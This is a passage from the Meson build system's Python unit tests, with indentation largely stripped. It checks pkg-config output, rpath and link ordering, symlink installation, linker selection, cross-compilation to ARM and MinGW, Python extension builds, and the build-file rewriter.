cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv)
self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.')
# Test that the result is usable.
self.init(testdir2, override_envvars=myenv)
self.build(override_envvars=myenv)
myenv = os.environ.copy()
myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')])
if is_cygwin():
bin_dir = os.path.join(tempdirname, 'bin')
myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH']
self.assertTrue(os.path.isdir(lib_dir))
test_exe = os.path.join(self.builddir, 'pkguser')
self.assertTrue(os.path.isfile(test_exe))
subprocess.check_call(test_exe, env=myenv)
@skipIfNoPkgconfig
def test_pkgconfig_relative_paths(self):
testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths')
pkg_dir = os.path.join(testdir, 'pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc')))
env = get_fake_env(testdir, self.builddir, self.prefix)
env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='')
kwargs = {'required': True, 'silent': True}
relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs)
self.assertTrue(relative_path_dep.found())
# Ensure link_args are properly quoted
libpath = Path(self.builddir) / '../relativepath/lib'
link_args = ['-L' + libpath.as_posix(), '-lrelativepath']
self.assertEqual(relative_path_dep.get_link_args(), link_args)
@skipIfNoPkgconfig
def test_pkgconfig_internal_libraries(self):
        '''
        Test that an application can be built against installed static
        libraries that are found only through their generated pkg-config files.
        '''
with tempfile.TemporaryDirectory() as tempdirname:
# build library
testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries')
testdirlib = os.path.join(testdirbase, 'lib')
self.init(testdirlib, extra_args=['--prefix=' + tempdirname,
'--libdir=lib',
'--default-library=static'], default_args=False)
self.build()
self.install(use_destdir=False)
# build user of library
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_static_archive_stripping(self):
'''
Check that Meson produces valid static archives with --strip enabled
'''
with tempfile.TemporaryDirectory() as tempdirname:
testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping')
# build lib
self.new_builddir()
testdirlib = os.path.join(testdirbase, 'lib')
testlibprefix = os.path.join(tempdirname, 'libprefix')
self.init(testdirlib, extra_args=['--prefix=' + testlibprefix,
'--libdir=lib',
'--default-library=static',
'--buildtype=debug',
'--strip'], default_args=False)
self.build()
self.install(use_destdir=False)
# build executable (uses lib, fails if static archive has been stripped incorrectly)
pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig')
self.new_builddir()
self.init(os.path.join(testdirbase, 'app'),
override_envvars={'PKG_CONFIG_PATH': pkg_dir})
self.build()
@skipIfNoPkgconfig
def test_pkgconfig_formatting(self):
testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv)
deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething']
if is_windows() or is_cygwin() or is_osx() or is_openbsd():
# On Windows, libintl is a separate library
deps.append(b'-lintl')
self.assertEqual(set(deps), set(stdo.split()))
@skipIfNoPkgconfig
@skip_if_not_language('cs')
def test_pkgconfig_csharp_library(self):
testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip())
@skipIfNoPkgconfig
def test_pkgconfig_link_order(self):
'''
Test that libraries are listed before their dependencies.
'''
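        # Rationale: a traditional single-pass static linker only pulls objects
        # out of an archive to satisfy symbols that are already undefined, so a
        # library has to be listed before the libraries it depends on.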
testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order')
self.init(testdir)
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = self.privatedir
stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv)
deps = stdo.split()
        self.assertLess(deps.index(b'-lsomething'), deps.index(b'-ldependency'))
def test_deterministic_dep_order(self):
'''
Test that the dependencies are always listed in a deterministic order.
'''
testdir = os.path.join(self.unit_test_dir, '43 dep order')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'build myexe:' in line or 'build myexe.exe:' in line:
self.assertIn('liblib1.a liblib2.a', line)
return
raise RuntimeError('Could not find the build rule')
def test_deterministic_rpath_order(self):
'''
Test that the rpaths are always listed in a deterministic order.
'''
if is_cygwin():
raise unittest.SkipTest('rpath are not used on Cygwin')
testdir = os.path.join(self.unit_test_dir, '42 rpath order')
self.init(testdir)
if is_osx():
rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2')
else:
rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2')
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if '-rpath' in line:
self.assertRegex(line, rpathre)
return
raise RuntimeError('Could not find the rpath')
def test_override_with_exe_dep(self):
'''
Test that we produce the correct dependencies when a program is overridden with an executable.
'''
testdir = os.path.join(self.common_test_dir, '201 override with exe')
self.init(testdir)
with open(os.path.join(self.builddir, 'build.ninja')) as bfile:
for line in bfile:
if 'main1.c:' in line or 'main2.c:' in line:
self.assertIn('| subprojects/sub/foobar', line)
@skipIfNoPkgconfig
def test_usage_external_library(self):
'''
Test that uninstalled usage of an external library (from the system or
PkgConfigDependency) works. On macOS, this workflow works out of the
        box. On Linux, BSDs, Windows, etc, you need to set extra arguments such
        as LD_LIBRARY_PATH, etc, so the post-install part of this test only
        runs on macOS.
The system library is found with cc.find_library() and pkg-config deps.
'''
oldprefix = self.prefix
# Install external library so we can find it
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library')
# install into installdir without using DESTDIR
installdir = self.installdir
self.prefix = installdir
self.init(testdir)
self.prefix = oldprefix
self.build()
self.install(use_destdir=False)
## New builddir for the consumer
self.new_builddir()
env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir),
'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')}
testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library')
# install into installdir without using DESTDIR
self.prefix = self.installdir
self.init(testdir, override_envvars=env)
self.prefix = oldprefix
self.build(override_envvars=env)
# test uninstalled
self.run_tests(override_envvars=env)
if not is_osx():
# Rest of the workflow only works on macOS
return
# test running after installation
self.install(use_destdir=False)
prog = os.path.join(self.installdir, 'bin', 'prog')
self._run([prog])
out = self._run(['otool', '-L', prog])
self.assertNotIn('@rpath', out)
## New builddir for testing that DESTDIR is not added to install_name
self.new_builddir()
# install into installdir with DESTDIR
self.init(testdir, override_envvars=env)
self.build(override_envvars=env)
# test running after installation
self.install(override_envvars=env)
prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog')
lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib')
for f in prog, lib:
out = self._run(['otool', '-L', f])
# Ensure that the otool output does not contain self.installdir
self.assertNotRegex(out, self.installdir + '.*dylib ')
def install_subdir_invalid_symlinks(self, testdir, subdir_path):
'''
Test that installation of broken symlinks works fine.
https://github.com/mesonbuild/meson/issues/3914
'''
testdir = os.path.join(self.common_test_dir, testdir)
subdir = os.path.join(testdir, subdir_path)
with chdir(subdir):
# Can't distribute broken symlinks in the source tree because it breaks
# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
                # Assert that the library is only mentioned once on this line
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
crossfile = tempfile.NamedTemporaryFile(mode='w')
env = {'CC': '"' + os.path.join(testdir, 'build_wrapper.py') + '"'}
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
        # Test that the installed libraries work
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvar = mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]
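        # evarMap translates '<lang>_ld' into the environment variable that
        # selects the linker, e.g. 'c_ld' -> 'CC_LD' (example mapping; the full
        # table lives in mesonbuild.envconfig.BinaryTable).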
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('foo') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skipIfNoExecutable('rustc')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skipIfNoExecutable('gfortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '73 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
        self.fail('Option libdir not in introspect data.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
        # When specifying a known name (python2 / python3), the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
            # python2 is not necessarily installed on the test machine. If it
            # is not, or if the python headers can't be found, the test will
            # raise MESON_SKIP_TEST. We could check beforehand which python
            # version is available, but that is the job of the module itself
            # (a bit of a chicken-and-egg situation), so we just ask for
            # forgiveness rather than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
                # Same as above: pypy2 and pypy3 are not expected to be present
                # on the test system; the test project only raises in these cases.
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
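    # Commands passed to rewrite() are either a path to a JSON file shipped
    # with the test project (info.json, addSrc.json, ...) or an inline JSON
    # string: a list of operation dicts such as
    #   {"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": [...]}
    # as constructed in test_target_add_sources_abs below.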
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
    def test_target_add(self):
self.prime('1 basic')
